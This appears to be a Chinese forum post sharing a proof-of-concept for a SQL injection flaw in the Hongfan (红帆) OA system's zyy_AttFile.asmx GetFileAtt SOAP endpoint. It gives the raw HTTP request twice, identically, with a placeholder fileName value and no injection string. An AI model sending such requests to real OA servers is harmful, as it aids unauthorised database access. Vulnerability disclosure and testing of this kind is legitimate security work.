|
|
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!
红帆 OA 注入
- POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
- Host: 10.250.250.5
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
- like Gecko) Version/12.0.3 Safari/605.1.15
- Content-Length: 383
- Content-Type: text/xml; charset=utf-8
- Soapaction: "http://tempuri.org/GetFileAtt"
- Accept-Encoding: gzip, deflate
- Connection: close
- <?xml version="1.0" encoding="utf-8"?><soap:Envelope
- xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
- xmlns:xsd="http://www.w3.org/2001/XMLSchema"
- xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt
- xmlns="http://tempuri.org/"><fileName>123</fileName></GetFileAtt> </soap:Body></so
- ap:Envelope>
红帆 OA zyy_AttFile.asmx SQL 注入漏洞
- POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
- Host: 10.250.250.5
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
- like Gecko) Version/12.0.3 Safari/605.1.15
- Content-Length: 383
- Content-Type: text/xml; charset=utf-8
- Soapaction: "http://tempuri.org/GetFileAtt"
- Accept-Encoding: gzip, deflate
- Connection: close
- <?xml version="1.0" encoding="utf-8"?><soap:Envelope
- xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
- xmlns:xsd="http://www.w3.org/2001/XMLSchema"
- xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt
- xmlns="http://tempuri.org/"><fileName>123</fileName></GetFileAtt> </soap:Body></so
- ap:Envelope>
|
|
窥视卡
雷达卡
发表于 2023-8-16 22:21:09
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜